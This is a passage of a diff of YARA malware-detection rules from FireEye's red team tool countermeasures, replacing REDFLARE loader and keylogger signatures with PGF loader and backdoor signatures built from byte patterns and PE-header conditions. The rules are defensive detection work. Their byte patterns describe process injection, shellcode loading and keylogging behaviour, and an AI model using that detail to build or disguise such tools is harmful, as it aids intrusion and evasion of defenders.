74 ?? 48 8B 85 ?? ?? ?? ?? 48 89 45 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 48 8D 95 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 89 45 ?? EB ?? 48 8B 45 ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 83 7D ?? 00 74 ?? 83 7D ?? 00 75 ?? BB 00 00 00 00 E9 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 89 45 ?? 48 89 E8 48 89 45 ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 C7 45 ?? 00 00 00 00 48 8B 55 ?? 48 8B 85 ?? ?? ?? ?? 48 39 C2 0F 83 ?? ?? ?? ?? 48 8B 45 ?? 48 8B 00 48 3D FF 0F 00 00 0F 86 ?? ?? ?? ?? 48 8B 45 ?? 48 8B 00 48 39 45 ?? 73 ?? 48 8B 45 ?? 48 8B 00 48 8B 55 ?? 48 81 C2 00 10 00 00 48 39 D0 73 ?? C7 45 ?? 01 00 00 00 83 7D ?? 00 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 8B 00 48 39 45 ?? 0F 83 ?? ?? ?? ?? 48 8B 45 ?? 48 8B 00 8B 4D ?? 48 8B 55 ?? 48 01 CA 48 39 D0 0F 83 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? 00 00 00 00 48 C7 85 ?? ?? ?? ?? 00 00 00 00 48 C7 85 ?? ?? ?? ?? 00 00 00 00 48 C7 85 ?? ?? ?? ?? 00 00 00 00 48 C7 85 ?? ?? ?? ?? 00 00 00 00 48 C7 85 ?? ?? ?? ?? 00 00 00 00 48 8B 45 ?? 48 8B 00 48 8D 95 ?? ?? ?? ?? 41 B8 30 00 00 00 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 8B 85 ?? ?? ?? ?? 83 E0 20 85 C0 74 ?? 48 8B 45 ?? 48 8B 00 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? BB 00 00 00 00 EB ?? 90 EB ?? 90 48 83 45 ?? 08 E9 ?? ?? ?? ?? 48 8B 45 ?? 48 89 45 ?? 48 8B 45 ?? 8B 40 ?? 48 63 D0 48 8B 45 ?? 48 01 D0 48 89 45 ?? 48 8B 45 ?? 8B 40 ?? 89 C2 48 8B 45 ?? 48 01 D0 48 89 45 ?? 48 8B 45 ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? BB 01 00 00 00 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 83 FB 01 EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 90 48 81 C4 28 07 00 00 5B 5D C3 } + $cond3 = { 55 53 48 89 E5 48 81 EC 28 07 00 00 48 8B 05 C1 7C 06 00 FF D0 48 89 C1 48 8D 85 98 FD FF FF 41 B8 04 01 00 00 48 89 C2 E8 33 B4 00 00 85 C0 0F 94 C0 84 C0 0F 85 16 03 00 00 48 8D 45 AF 48 89 C1 E8 B2 FE 00 00 48 8D 4D AF 48 8D 95 98 FD FF FF 48 8D 85 78 FD FF FF 49 89 C8 48 89 C1 E8 75 96 01 00 48 8D 45 AF 48 89 C1 E8 B9 FE 00 00 48 8B 05 66 7C 06 00 FF D0 89 C2 B9 08 00 00 00 E8 3C B4 00 00 48 89 45 D0 48 83 7D D0 00 75 0A BB 00 00 00 00 E9 6C 02 00 00 48 C7 45 F0 00 00 00 00 C7 45 EC 00 00 00 00 C7 85 38 F9 FF FF 38 04 00 00 48 8D 95 38 F9 FF FF 48 8B 45 D0 48 89 C1 E8 83 B3 00 00 89 45 E8 83 7D E8 00 74 57 48 8D 85 38 F9 FF FF 48 8D 50 30 48 8D 85 78 FD FF FF 41 B8 00 00 00 00 48 89 C1 E8 2A F3 00 00 48 83 F8 FF 0F 95 C0 84 C0 74 14 48 8B 85 50 F9 FF FF 48 89 45 F0 8B 85 58 F9 FF FF 89 45 EC 48 8D 95 38 F9 FF FF 48 8B 45 D0 48 89 C1 E8 28 B3 00 00 89 45 E8 EB A3 48 8B 45 D0 48 89 C1 48 8B 05 69 7B 06 00 FF D0 48 83 7D F0 00 74 06 83 7D EC 00 75 0A BB 00 00 00 00 E9 B9 01 00 00 48 8D 0D 11 B9 05 00 48 8B 05 A2 7B 06 00 FF D0 48 8D 15 0D B9 05 00 48 89 C1 48 8B 05 97 7B 06 00 FF D0 48 89 45 C8 48 89 E8 48 89 45 E0 48 8D 95 28 F9 FF FF 48 8D 85 30 F9 FF FF 48 89 C1 48 8B 05 5A 7B 06 00 FF D0 C7 45 DC 00 00 00 00 48 8B 55 E0 48 8B 85 28 F9 FF FF 48 39 C2 0F 83 0D 01 00 00 48 8B 45 E0 48 8B 00 48 3D FF 0F 00 00 0F 86 EC 00 00 00 48 8B 45 E0 48 8B 00 48 39 45 C8 73 1E 48 8B 45 E0 48 8B 00 48 8B 55 C8 48 81 C2 00 10 00 00 48 39 D0 73 07 C7 45 DC 01 00 00 00 83 7D DC 00 0F 84 BB 00 00 00 48 8B 45 E0 48 8B 00 48 39 45 F0 0F 83 AA 00 00 00 48 8B 45 E0 48 8B 00 8B 4D EC 48 8B 55 F0 48 01 CA 48 39 D0 0F 83 90 00 00 00 48 C7 85 F8 F8 FF FF 00 00 00 00 48 C7 85 00 F9 FF FF 00 00 00 00 48 C7 85 08 F9 FF FF 00 00 00 00 48 C7 85 10 F9 FF FF 00 00 00 00 48 C7 85 18 F9 FF FF 00 00 00 00 48 C7 85 20 F9 FF FF 00 00 00 00 48 8B 45 E0 48 8B 00 48 8D 95 F8 F8 FF FF 41 B8 30 00 00 00 48 89 C1 48 8B 05 22 7B 06 00 FF D0 8B 85 1C F9 FF FF 83 E0 20 85 C0 74 20 48 8B 45 E0 48 8B 00 48 8D 15 59 FB FF FF 48 89 C1 E8 D5 FC FF FF BB 00 00 00 00 EB 57 90 EB 01 90 48 83 45 E0 08 E9 DF FE FF FF 48 8B 45 F0 48 89 45 C0 48 8B 45 C0 8B 40 3C 48 63 D0 48 8B 45 F0 48 01 D0 48 89 45 B8 48 8B 45 B8 8B 40 28 89 C2 48 8B 45 F0 48 01 D0 48 89 45 B0 48 8B 45 B0 48 8D 15 00 FB FF FF 48 89 C1 E8 7C FC FF FF BB 01 00 00 00 48 8D 85 78 FD FF FF 48 89 C1 E8 94 9C 01 00 83 FB 01 EB 38 48 89 C3 48 8D 45 AF 48 89 C1 E8 00 FC 00 00 48 89 D8 48 89 C1 E8 45 AA 00 00 48 89 C3 48 8D 85 78 FD FF FF 48 89 C1 E8 63 9C 01 00 48 89 D8 48 89 C1 E8 28 AA 00 00 90 48 81 C4 28 07 00 00 5B 5D C3 } + $cond4 = { 55 53 48 89 E5 48 81 EC 28 07 00 00 48 8B 05 D3 8B 06 00 FF D0 48 89 C1 48 8D 85 98 FD FF FF 41 B8 04 01 00 00 48 89 C2 E8 65 B4 00 00 85 C0 0F 94 C0 84 C0 0F 85 16 03 00 00 48 8D 45 AF 48 89 C1 E8 EC FE 00 00 48 8D 4D AF 48 8D 95 98 FD FF FF 48 8D 85 78 FD FF FF 49 89 C8 48 89 C1 E8 AF 96 01 00 48 8D 45 AF 48 89 C1 E8 F3 FE 00 00 48 8B 05 78 8B 06 00 FF D0 89 C2 B9 08 00 00 00 E8 6E B4 00 00 48 89 45 D0 48 83 7D D0 00 75 0A BB 00 00 00 00 E9 6C 02 00 00 48 C7 45 F0 00 00 00 00 C7 45 EC 00 00 00 00 C7 85 38 F9 FF FF 38 04 00 00 48 8D 95 38 F9 FF FF 48 8B 45 D0 48 89 C1 E8 B5 B3 00 00 89 45 E8 83 7D E8 00 74 57 48 8D 85 38 F9 FF FF 48 8D 50 30 48 8D 85 78 FD FF FF 41 B8 00 00 00 00 48 89 C1 E8 64 F3 00 00 48 83 F8 FF 0F 95 C0 84 C0 74 14 48 8B 85 50 F9 FF FF 48 89 45 F0 8B 85 58 F9 FF FF 89 45 EC 48 8D 95 38 F9 FF FF 48 8B 45 D0 48 89 C1 E8 5A B3 00 00 89 45 E8 EB A3 48 8B 45 D0 48 89 C1 48 8B 05 73 8A 06 00 FF D0 48 83 7D F0 00 74 06 83 7D EC 00 75 0A BB 00 00 00 00 E9 B9 01 00 00 48 8D 0D 45 C8 05 00 48 8B 05 B4 8A 06 00 FF D0 48 8D 15 41 C8 05 00 48 89 C1 48 8B 05 A9 8A 06 00 FF D0 48 89 45 C8 48 89 E8 48 89 45 E0 48 8D 95 28 F9 FF FF 48 8D 85 30 F9 FF FF 48 89 C1 48 8B 05 6C 8A 06 00 FF D0 C7 45 DC 00 00 00 00 48 8B 55 E0 48 8B 85 28 F9 FF FF 48 39 C2 0F 83 0D 01 00 00 48 8B 45 E0 48 8B 00 48 3D FF 0F 00 00 0F 86 EC 00 00 00 48 8B 45 E0 48 8B 00 48 39 45 C8 73 1E 48 8B 45 E0 48 8B 00 48 8B 55 C8 48 81 C2 00 10 00 00 48 39 D0 73 07 C7 45 DC 01 00 00 00 83 7D DC 00 0F 84 BB 00 00 00 48 8B 45 E0 48 8B 00 48 39 45 F0 0F 83 AA 00 00 00 48 8B 45 E0 48 8B 00 8B 4D EC 48 8B 55 F0 48 01 CA 48 39 D0 0F 83 90 00 00 00 48 C7 85 F8 F8 FF FF 00 00 00 00 48 C7 85 00 F9 FF FF 00 00 00 00 48 C7 85 08 F9 FF FF 00 00 00 00 48 C7 85 10 F9 FF FF 00 00 00 00 48 C7 85 18 F9 FF FF 00 00 00 00 48 C7 85 20 F9 FF FF 00 00 00 00 48 8B 45 E0 48 8B 00 48 8D 95 F8 F8 FF FF 41 B8 30 00 00 00 48 89 C1 48 8B 05 54 8A 06 00 FF D0 8B 85 1C F9 FF FF 83 E0 20 85 C0 74 20 48 8B 45 E0 48 8B 00 48 8D 15 33 FA FF FF 48 89 C1 E8 D5 FC FF FF BB 00 00 00 00 EB 57 90 EB 01 90 48 83 45 E0 08 E9 DF FE FF FF 48 8B 45 F0 48 89 45 C0 48 8B 45 C0 8B 40 3C 48 63 D0 48 8B 45 F0 48 01 D0 48 89 45 B8 48 8B 45 B8 8B 40 28 89 C2 48 8B 45 F0 48 01 D0 48 89 45 B0 48 8B 45 B0 48 8D 15 DA F9 FF FF 48 89 C1 E8 7C FC FF FF BB 01 00 00 00 48 8D 85 78 FD FF FF 48 89 C1 E8 CE 9C 01 00 83 FB 01 EB 38 48 89 C3 48 8D 45 AF 48 89 C1 E8 3A FC 00 00 48 89 D8 48 89 C1 E8 4F AA 00 00 48 89 C3 48 8D 85 78 FD FF FF 48 89 C1 E8 9D 9C 01 00 48 89 D8 48 89 C1 E8 32 AA 00 00 90 48 81 C4 28 07 00 00 5B 5D C3 } condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x020B) and any of them } -rule FIREEYE_RT_APT_Loader_Raw64_REDFLARE_1 : FILE +rule FIREEYE_RT_APT_Loader_MSIL_PGF_1 : FILE { meta: - description = "No description has been set in the source file - FireEye-RT" + description = "base.cs" author = "FireEye" - id = "8e937f6a-404f-53bd-9de2-ed63b1cf48b2" - date = "2020-11-27" - date = "2020-11-27" + id = "39d9821f-86e8-528a-a0a9-287dbe325484" + date = "2020-11-24" + date = "2020-11-24" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Loader_Raw64_REDFLARE_1.yar#L4-L16" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_MSIL_PGF_1.yar#L4-L17" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "5e14f77f85fd9a5be46e7f04b8a144f5" - logic_hash = "dac122ccece8a6dd35a5fe9d37860a612aa50ab469b79f4375dbe776f60c7b57" + hash = "a495c6d11ff3f525915345fb762f8047" + logic_hash = "4174ed53336f3951d26282dc81b99b2044ac6350d4b4c0074194a9b4acecefee" score = 75 quality = 75 tags = "FILE" rev = 1 strings: - $load = { EB ?? 58 48 8B 10 4C 8B 48 ?? 48 8B C8 [1-10] 48 83 C1 ?? 48 03 D1 FF } + $sb1 = { 72 [4] 6F [2] 00 0A 26 [0-16] 0? 6F [2] 00 0A [1-3] 0? 28 [2] 00 0A [0-1] 0? 72 [4-5] 0? 28 [2] 00 0A [0-1] 0? 6F [2] 00 0A 13 ?? 1? 13 ?? 38 [8-16] 91 [3-6] 8E 6? 5D 91 61 D2 9C 11 ?? 1? 58 13 [3-5] 8E 6? 3F } condition: - ( uint16(0)!=0x5A4D) and all of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and all of them } -rule FIREEYE_RT_APT_Keylogger_Win64_REDFLARE_1 : FILE +rule FIREEYE_RT_APT_Loader_Win64_PGF_5 : FILE { meta: - description = "No description has been set in the source file - FireEye-RT" + description = "PGF payload, generated rule based on symfunc/8167a6d94baca72bac554299d7c7f83c" author = "FireEye" - id = "3c980f5a-c775-5c25-ba28-91a93a1b9a85" - date = "2020-12-01" - date = "2020-12-01" + id = "4fa4a1d6-cb63-582d-801c-b4c89c44d9ca" + date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Keylogger_Win64_REDFLARE_1.yar#L4-L17" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win64_PGF_5.yar#L4-L18" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "fbefb4074f1672a3c29c1a47595ea261" - logic_hash = "26fe577ba637c484d9a8ccc2173b5892a76328a90a39a2bebbae6bd2a6329485" + hash = "150224a0ccabce79f963795bf29ec75b" + logic_hash = "16495ad1e5ce4d4a79f4067f3d687911a1a0a3bfe4c6409ff9de4d111b1ddca6" score = 75 quality = 75 tags = "FILE" - rev = 1 + rev = 3 strings: - $create_window = { 41 B9 00 00 CF 00 [4-40] 33 C9 [2-10] 00 00 00 80 [2-10] 00 00 00 80 [2-10] 00 00 00 80 [2-10] 00 00 00 80 FF 15 } - $keys_check = { B9 14 00 00 00 FF 15 [4-8] B9 10 00 00 00 FF 15 [4] BE 00 80 FF FF 66 85 C6 75 ?? B9 A0 00 00 00 FF 15 [4] 66 85 C6 75 ?? B9 A1 00 00 00 FF 15 [4] 66 85 C6 74 } + $cond1 = { 4C 89 44 24 18 89 54 24 10 48 89 4C 24 08 48 83 EC 38 48 8B 4C 24 40 FF 15 13 FA FF FF 8B 44 24 48 89 44 24 20 83 7C 24 20 01 74 02 EB 17 48 8B 44 24 40 48 89 05 66 23 00 00 48 8B 4C 24 40 FF 15 EB F9 FF FF B8 01 00 00 00 48 83 C4 38 C3 } + $cond2 = { 4C 89 44 24 18 89 54 24 10 48 89 4C 24 08 48 83 EC 38 48 8B 4C 24 40 FF 15 A3 FA FF FF 8B 44 24 48 89 44 24 20 83 7C 24 20 01 74 02 EB 17 48 8B 44 24 40 48 89 05 F6 20 00 00 48 8B 4C 24 40 FF 15 7B FA FF FF B8 01 00 00 00 48 83 C4 38 C3 } + $cond3 = { 4C 89 44 24 18 89 54 24 10 48 89 4C 24 08 48 83 EC 38 48 8B 4C 24 40 FF ?? ?? ?? ?? ?? 8B 44 24 48 89 44 24 20 83 7C 24 2? ?1 74 ?? EB ?? 48 8B 44 24 40 48 ?? ?? ?? ?? ?? ?? 48 8B 4C 24 40 FF ?? ?? ?? ?? ?? B8 01 ?? ?? ?? 48 83 C4 38 C3 } + $cond4 = { 4C 89 44 24 ?? 89 54 24 ?? 48 89 4C 24 ?? 48 83 EC 38 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 83 7C 24 ?? 01 74 ?? EB ?? 48 8B 44 24 ?? 48 89 05 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? B8 01 00 00 00 48 83 C4 38 C3 } condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x020B) and all of them + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x020B) and any of them } -rule FIREEYE_RT_APT_Loader_Win32_REDFLARE_2 : FILE +rule FIREEYE_RT_APT_Loader_Win_PGF_2 : FILE { meta: - description = "No description has been set in the source file - FireEye-RT" + description = "PE rich header matches PGF backdoor" author = "FireEye" - id = "6a585401-bfd3-5aad-b484-09b6a30d9af5" - date = "2020-11-27" - date = "2020-11-27" + id = "595c9e2a-3d9d-5366-9449-de1bcf333f78" + date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Loader_Win32_REDFLARE_2.yar#L4-L17" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win_PGF_2.yar#L4-L21" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "4e7e90c7147ee8aa01275894734f4492" - logic_hash = "98dfb71adbde4f8965e612c19f0965d8fa95805825569290fdf72eb1d86cfb70" + hash = "226b1ac427eb5a4dc2a00cc72c163214" + logic_hash = "b8c024c6b4c3ce9915700b62da8a1f12440215b46f3a56078707f5257e575811" score = 75 quality = 75 tags = "FILE" - rev = 1 + md5_2 = "2398ed2d5b830d226af26dedaf30f64a" + md5_3 = "24a7c99da9eef1c58f09cf09b9744d7b" + md5_4 = "aeb0e1d0e71ce2a08db9b1e5fb98e0aa" + rev = 4 strings: - $inject = { 83 F8 01 [4-50] 6A 00 6A 00 68 04 00 00 08 6A 00 6A 00 6A 00 6A 00 5? [10-70] FF 15 [4] 85 C0 [1-20] 6A 04 68 00 10 00 00 5? 6A 00 5? [1-10] FF 15 [4-8] 85 C0 [1-20] 5? 5? 5? 8B [1-4] 5? 5? FF 15 [4] 85 C0 [1-20] 6A 20 [4-20] FF 15 [4] 85 C0 [1-40] 01 00 01 00 [2-20] FF 15 [4] 85 C0 [1-30] FF 15 [4] 85 C0 [1-20] FF 15 [4] 83 F8 FF } - $s1 = "ResumeThread" + $rich1 = { A8 B7 17 3A EC D6 79 69 EC D6 79 69 EC D6 79 69 2F D9 24 69 E8 D6 79 69 E5 AE EC 69 EA D6 79 69 EC D6 78 69 A8 D6 79 69 E5 AE EA 69 EF D6 79 69 E5 AE FA 69 D0 D6 79 69 E5 AE EB 69 ED D6 79 69 E5 AE FD 69 E2 D6 79 69 CB 10 07 69 ED D6 79 69 E5 AE E8 69 ED D6 79 69 } + $rich2 = { C1 CF 75 A4 85 AE 1B F7 85 AE 1B F7 85 AE 1B F7 8C D6 88 F7 83 AE 1B F7 0D C9 1A F6 87 AE 1B F7 0D C9 1E F6 8F AE 1B F7 0D C9 1F F6 8F AE 1B F7 0D C9 18 F6 84 AE 1B F7 DE C6 1A F6 86 AE 1B F7 85 AE 1A F7 BF AE 1B F7 84 C3 12 F6 81 AE 1B F7 84 C3 E4 F7 84 AE 1B F7 84 C3 19 F6 84 AE 1B F7 } + $rich3 = { D6 60 82 B8 92 01 EC EB 92 01 EC EB 92 01 EC EB 9B 79 7F EB 94 01 EC EB 1A 66 ED EA 90 01 EC EB 1A 66 E9 EA 98 01 EC EB 1A 66 E8 EA 9A 01 EC EB 1A 66 EF EA 90 01 EC EB C9 69 ED EA 91 01 EC EB 92 01 ED EB AF 01 EC EB 93 6C E5 EA 96 01 EC EB 93 6C 13 EB 93 01 EC EB 93 6C EE EA 93 01 EC EB } + $rich4 = { 41 36 64 33 05 57 0A 60 05 57 0A 60 05 57 0A 60 73 CA 71 60 01 57 0A 60 0C 2F 9F 60 04 57 0A 60 0C 2F 89 60 3D 57 0A 60 0C 2F 8E 60 0A 57 0A 60 05 57 0B 60 4A 57 0A 60 0C 2F 99 60 06 57 0A 60 73 CA 67 60 04 57 0A 60 0C 2F 98 60 04 57 0A 60 0C 2F 80 60 04 57 0A 60 22 91 74 60 04 57 0A 60 0C 2F 9B 60 04 57 0A 60 } condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x010B) and all of them + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and filesize <15MB and (($rich1 at 128) or ($rich2 at 128) or ($rich3 at 128) or ($rich4 at 128)) } -rule FIREEYE_RT_APT_Loader_Win32_REDFLARE_1 : FILE +rule FIREEYE_RT_APT_Loader_Win32_PGF_3 : FILE { meta: - description = "No description has been set in the source file - FireEye-RT" + description = "PGF payload, generated rule based on symfunc/c02594972dbab6d489b46c5dee059e66. Identifies dllmain_hook x86 payloads." author = "FireEye" - id = "b8a2c388-3b27-5075-b0ee-2773ae0c67ad" - date = "2020-11-27" - date = "2020-11-27" + id = "adf91482-6e04-5d11-bc00-4b1c7a802c49" + date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Loader_Win32_REDFLARE_1.yar#L4-L17" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win32_PGF_3.yar#L4-L20" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "01d68343ac46db6065f888a094edfe4f" - logic_hash = "f9165aabe4bad215211cf98559099030ddb8a76175fbfcfee3c6f25d7614bdad" + hash = "4414953fa397a41156f6fa4f9462d207" + logic_hash = "24d2caad1d740ccbff0cf111a05ecad20ed06f311d530d8de86050d916da32ce" score = 75 quality = 75 tags = "FILE" - rev = 1 + rev = 4 strings: - $alloc_n_load = { 6A 40 68 00 30 00 00 [0-20] 6A 00 [0-20] FF D0 [4-60] F3 A4 [30-100] 6B C0 28 8B 4D ?? 8B 4C 01 10 8B 55 ?? 6B D2 28 } - $const_values = { 0F B6 ?? 83 C? 20 83 F? 6D [2-20] 83 C? 20 83 F? 7A } + $cond1 = { 55 89 E5 57 56 53 81 EC FC 06 00 00 C7 85 2C F9 FF FF 90 EE 01 6D C7 85 30 F9 FF FF 6C FE 01 6D 8D 85 34 F9 FF FF 89 28 BA CC 19 00 6D 89 50 04 89 60 08 8D 85 14 F9 FF FF 89 04 24 E8 BB A6 00 00 A1 48 A1 05 6D C7 85 18 F9 FF FF FF FF FF FF FF D0 C7 44 24 08 04 01 00 00 8D 95 B6 FD FF FF 89 54 24 04 89 04 24 E8 B8 AE 00 00 83 EC 0C 85 C0 0F 94 C0 84 C0 0F 85 8B 03 00 00 8D 45 BF 89 C1 E8 56 0B 01 00 8D 85 9C FD FF FF 8D 55 BF 89 54 24 04 8D 95 B6 FD FF FF 89 14 24 C7 85 18 F9 FF FF 01 00 00 00 89 C1 E8 DF B5 01 00 83 EC 08 8D 45 BF 89 C1 E8 52 0B 01 00 A1 4C A1 05 6D C7 85 18 F9 FF FF 02 00 00 00 FF D0 89 44 24 04 C7 04 24 08 00 00 00 E8 51 AE 00 00 83 EC 08 89 45 D0 83 7D D0 00 75 0F C7 85 10 F9 FF FF 00 00 00 00 E9 8C 02 00 00 C7 45 E4 00 00 00 00 C7 45 E0 00 00 00 00 C7 85 74 F9 FF FF 28 04 00 00 8D 85 74 F9 FF FF 89 44 24 04 8B 45 D0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 EF AD 00 00 83 EC 08 89 45 DC 83 7D DC 00 74 67 8D 85 9C FD FF FF C7 44 24 04 00 00 00 00 8D 95 74 F9 FF FF 83 C2 20 89 14 24 89 C1 E8 82 FF 00 00 83 EC 08 83 F8 FF 0F 95 C0 84 C0 74 12 8B 85 88 F9 FF FF 89 45 E4 8B 85 8C F9 FF FF 89 45 E0 8D 85 74 F9 FF FF 89 44 24 04 8B 45 D0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 84 AD 00 00 83 EC 08 89 45 DC EB 93 8B 45 D0 89 04 24 A1 2C A1 05 6D C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 04 83 7D E4 00 74 06 83 7D E0 00 75 0F C7 85 10 F9 FF FF 00 00 00 00 E9 AD 01 00 00 C7 04 24 0C 40 05 6D A1 5C A1 05 6D C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 04 C7 44 24 04 18 40 05 6D 89 04 24 A1 60 A1 05 6D FF D0 83 EC 08 89 45 CC 89 E8 89 45 D8 8D 85 6C F9 FF FF 89 44 24 04 8D 85 70 F9 FF FF 89 04 24 A1 54 A1 05 6D FF D0 83 EC 08 C7 45 D4 00 00 00 00 8B 55 D8 8B 85 6C F9 FF FF 39 C2 0F 83 F5 00 00 00 8B 45 D8 8B 00 3D FF 0F 00 00 0F 86 D8 00 00 00 8B 45 D8 8B 00 39 45 CC 73 19 8B 45 D8 8B 00 8B 55 CC 81 C2 00 10 00 00 39 D0 73 07 C7 45 D4 01 00 00 00 83 7D D4 00 0F 84 AF 00 00 00 8B 45 D8 8B 00 39 45 E4 0F 83 A1 00 00 00 8B 45 D8 8B 00 8B 4D E4 8B 55 E0 01 CA 39 D0 0F 83 8C 00 00 00 B9 00 00 00 00 B8 1C 00 00 00 83 E0 FC 89 C2 B8 00 00 00 00 89 8C 05 50 F9 FF FF 83 C0 04 39 D0 72 F2 8B 45 D8 8B 00 C7 44 24 08 1C 00 00 00 8D 95 50 F9 FF FF 89 54 24 04 89 04 24 A1 9C A1 05 6D C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 0C 8B 85 64 F9 FF FF 83 E0 20 85 C0 74 2E 8B 45 D8 8B 00 C7 44 24 04 30 14 00 6D 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 59 FC FF FF C7 85 10 F9 FF FF 00 00 00 00 EB 58 90 EB 01 90 83 45 D8 04 E9 FA FE FF FF 8B 45 E4 89 45 C8 8B 45 C8 8B 40 3C 89 C2 8B 45 E4 01 D0 89 45 C4 8B 45 C4 8B 50 28 8B 45 E4 01 D0 89 45 C0 C7 44 24 04 30 14 00 6D 8B 45 C0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 FF FB FF FF C7 85 10 F9 FF FF 01 00 00 00 8D 85 9C FD FF FF 89 C1 E8 5D BC 01 00 83 BD 10 F9 FF FF 01 EB 70 8B 95 1C F9 FF FF 8B 85 18 F9 FF FF 85 C0 74 0C 83 E8 01 85 C0 74 2D 83 E8 01 0F 0B 89 95 10 F9 FF FF 8D 45 BF 89 C1 E8 48 08 01 00 8B 85 10 F9 FF FF 89 04 24 C7 85 18 F9 FF FF FF FF FF FF E8 A0 A6 00 00 89 95 10 F9 FF FF 8D 85 9C FD FF FF 89 C1 E8 FD BB 01 00 8B 85 10 F9 FF FF 89 04 24 C7 85 18 F9 FF FF FF FF FF FF E8 75 A6 00 00 90 8D 85 14 F9 FF FF 89 04 24 E8 76 A3 00 00 8D 65 F4 5B 5E 5F 5D C3 } + $cond2 = { 55 89 E5 57 56 53 81 EC FC 06 00 00 C7 85 2C F9 FF FF B0 EF 3D 6A C7 85 30 F9 FF FF 8C FF 3D 6A 8D 85 34 F9 FF FF 89 28 BA F4 1A 3C 6A 89 50 04 89 60 08 8D 85 14 F9 FF FF 89 04 24 E8 B3 A6 00 00 A1 64 A1 41 6A C7 85 18 F9 FF FF FF FF FF FF FF D0 C7 44 24 08 04 01 00 00 8D 95 B6 FD FF FF 89 54 24 04 89 04 24 E8 B0 AE 00 00 83 EC 0C 85 C0 0F 94 C0 84 C0 0F 85 8B 03 00 00 8D 45 BF 89 C1 E8 4E 0B 01 00 8D 85 9C FD FF FF 8D 55 BF 89 54 24 04 8D 95 B6 FD FF FF 89 14 24 C7 85 18 F9 FF FF 01 00 00 00 89 C1 E8 D7 B5 01 00 83 EC 08 8D 45 BF 89 C1 E8 4A 0B 01 00 A1 68 A1 41 6A C7 85 18 F9 FF FF 02 00 00 00 FF D0 89 44 24 04 C7 04 24 08 00 00 00 E8 49 AE 00 00 83 EC 08 89 45 D0 83 7D 